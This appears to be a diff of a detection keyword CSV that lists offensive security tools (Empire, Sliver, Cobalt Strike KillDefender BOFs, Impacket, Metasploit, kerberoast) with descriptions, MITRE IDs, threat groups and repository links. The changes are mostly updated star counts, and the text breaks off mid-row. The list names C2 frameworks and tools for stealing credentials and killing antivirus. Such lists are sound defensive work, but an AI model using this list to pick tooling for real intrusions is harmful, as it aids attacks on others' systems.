T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*kgretzky*","offensive_tool_keyword","Github Username","username Kuba Gretzky hosting sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -12759,9 +12915,9 @@ "*kh4sh3i/Spring-CVE*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*khast3x*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/khast3x","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*khast3x/h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" -"*Kicking off download cradle in a new process*","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*kick-operator -n *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*killAllNimplants*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Kicking off download cradle in a new process*","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kick-operator -n *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*killAllNimplants*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*killav.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*killdefender check*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender kill*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" @@ -12771,41 +12927,41 @@ "*KillDefender_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender_bof*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KillDefenderBOF-main*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" -"*Killed running eventvwr*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Killed running sdclt*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*kill-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*killprocess.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*Killed running eventvwr*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Killed running sdclt*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kill-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*killprocess.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*kimi_MDPC/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*kirbi_to_hashcat.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" -"*kirbi2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*kirbi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*kirbi2john.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*kirbikator.exe*","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","10","1277","216","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z" "*kite03/echoac-poc*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" -"*kitrap0d.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*kitrap0d_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 